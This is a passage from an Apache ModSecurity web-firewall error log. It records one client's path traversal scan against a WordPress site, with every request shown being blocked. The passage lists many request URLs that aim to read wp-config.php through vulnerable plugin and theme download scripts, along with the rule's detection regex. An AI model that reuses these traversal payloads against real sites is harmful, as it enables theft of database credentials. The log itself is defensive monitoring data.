"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/PlixPro/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/PlixPro/download.php"] [unique_id "ZEeepd-GjcOLRjW9Sa4WPQAAAII"] [Tue Apr 25 04:34:29.341945 2023] [:error] [pid 15580:tid 140447219951360] [client 37.120.213.169:41798] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/haarperfect/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/haarperfect/framework/utilities/download/getfile.php"] [unique_id "ZEeepd-GjcOLRjW9Sa4WPgAAAIE"] [Tue Apr 25 04:34:29.468294 2023] [:error] [pid 15580:tid 140447091513088] [client 37.120.213.169:41800] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/tools.php"] [unique_id "ZEeepd-GjcOLRjW9Sa4WPwAAAIg"] [Tue Apr 25 04:34:30.351245 2023] [:error] [pid 15580:tid 140447228344064] [client 37.120.213.169:41806] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZEeept-GjcOLRjW9Sa4WQQAAAIA"] [Tue Apr 25 04:34:30.481597 2023] [:error] [pid 15889:tid 140447049549568] [client 37.120.213.169:41808] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/download-zip-attachments/download.php?File=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/download-zip-attachments/download.php"] [unique_id "ZEeepl4G6tVEc6w5Us7gtgAAAM0"] [Tue Apr 25 04:34:32.059975 2023] [:error] [pid 15889:tid 140447032764160] [client 37.120.213.169:41814] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/3d-twitter-wall/proxy.php?url=file..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/3d-twitter-wall/proxy.php"] [unique_id "ZEeeqF4G6tVEc6w5Us7guQAAAM8"] [Tue Apr 25 04:34:32.185897 2023] [:error] [pid 15889:tid 140447228344064] [client 37.120.213.169:41816] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-emaily/wp-emaily-zip-creation.php"] [unique_id "ZEeeqF4G6tVEc6w5Us7gugAAAMA"] [Tue Apr 25 04:34:32.312107 2023] [:error] [pid 15889:tid 140447211558656] [client 37.120.213.169:41820] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ungallery/source.php?pic=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ungallery/source.php"] [unique_id "ZEeeqF4G6tVEc6w5Us7gvAAAAMI"] [Tue Apr 25 04:34:32.437683 2023] [:error] [pid 15889:tid 140446999193344] [client 37.120.213.169:41822] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/flash-album-gallery/facebook.php?i=1&f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZEeeqF4G6tVEc6w5Us7gvQAAANM"] [Tue Apr 25 04:34:32.563151 2023] [:error] [pid 15889:tid 140447066334976] [client 37.120.213.169:41824] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/section-widget/themes/theme-loader.php?theme=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/section-widget/themes/theme-loader.php"] [unique_id "ZEeeqF4G6tVEc6w5Us7gvgAAAMs"] [Tue Apr 25 04:34:32.701597 2023] [:error] [pid 15579:tid 140446990800640] [client 37.120.213.169:41826] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/yourls-widget/yourls-widget-hook.php?api_url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/yourls-widget/yourls-widget-hook.php"] [unique_id "ZEeeqCIlOCjnXl5KlpegfwAAAFQ"] [Tue Apr 25 04:34:32.828411 2023] [:error] [pid 15889:tid 140447007586048] [client 37.120.213.169:41828] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/3d-twitter-wall/proxy.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/3d-twitter-wall/proxy.php"] [unique_id "ZEeeqF4G6tVEc6w5Us7gvwAAANI"] [Tue Apr 25 04:34:32.953799 2023] [:error] [pid 15579:tid 140447007586048] [client 37.120.213.169:41830] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/w3-total-cache/pub/files.php?file=..%2F..%2F..%2F..%2Fwp-config.php&nonce=0"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/w3-total-cache/pub/files.php"] [unique_id "ZEeeqCIlOCjnXl5KlpeggAAAAFI"] [Tue Apr 25 04:34:34.599101 2023] [:error] [pid 15889:tid 140447074727680] [client 37.120.213.169:41836] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/count-per-day/download.php?n=1&f=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/count-per-day/download.php"] [unique_id "ZEeeql4G6tVEc6w5Us7gwAAAAMo"] [Tue Apr 25 04:34:34.733731 2023] [:error] [pid 15580:tid 140447007586048] [client 37.120.213.169:41838] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Rivercitychiro/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Rivercitychiro/framework/utilities/download/getfile.php"] [unique_id "ZEeeqt-GjcOLRjW9Sa4WQwAAAJI"] [Tue Apr 25 04:34:34.869103 2023] [:error] [pid 15889:tid 140447049549568] [client 37.120.213.169:41842] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/backbone/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/backbone/download.php"] [unique_id "ZEeeql4G6tVEc6w5Us7gwgAAAM0"] [Tue Apr 25 04:34:34.994806 2023] [:error] [pid 15579:tid 140447066334976] [client 37.120.213.169:41844] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cakifo/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cakifo/download.php"] [unique_id "ZEeeqiIlOCjnXl5KlpeggQAAAEs"] [Tue Apr 25 04:34:35.120567 2023] [:error] [pid 15580:tid 140446957229824] [client 37.120.213.169:41846] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/derby-book-festival/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/derby-book-festival/download.php"] [unique_id "ZEeeq9-GjcOLRjW9Sa4WRAAAAJg"] [Tue Apr 25 04:34:35.246118 2023] [:error] [pid 15578:tid 140447057942272] [client 37.120.213.169:41848] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/EEEZ/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/EEEZ/download.php"] [unique_id "ZEeeqz754oNYNW-15_AYhAAAAAw"] [Tue Apr 25 04:34:35.387683 2023] [:error] [pid 15889:tid 140447015978752] [client 37.120.213.169:41850] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/greenearth-v1-06/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/greenearth-v1-06/download.php"] [unique_id "ZEeeq14G6tVEc6w5Us7gwwAAANE"] [Tue Apr 25 04:34:35.514354 2023] [:error] [pid 15889:tid 140446990800640] [client 37.120.213.169:41852] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/IqraAcademy/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/IqraAcademy/download/download.php"] [unique_id "ZEeeq14G6tVEc6w5Us7gxAAAANQ"] [Tue Apr 25 04:34:35.658088 2023] [:error] [pid 15580:tid 140447057942272] [client 37.120.213.169:41854] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/lmm5th/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/lmm5th/download.php"] [unique_id "ZEeeq9-GjcOLRjW9Sa4WRQAAAIw"] [Tue Apr 25 04:34:35.790081 2023] [:error] [pid 15578:tid 140447074727680] [client 37.120.213.169:41856] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file 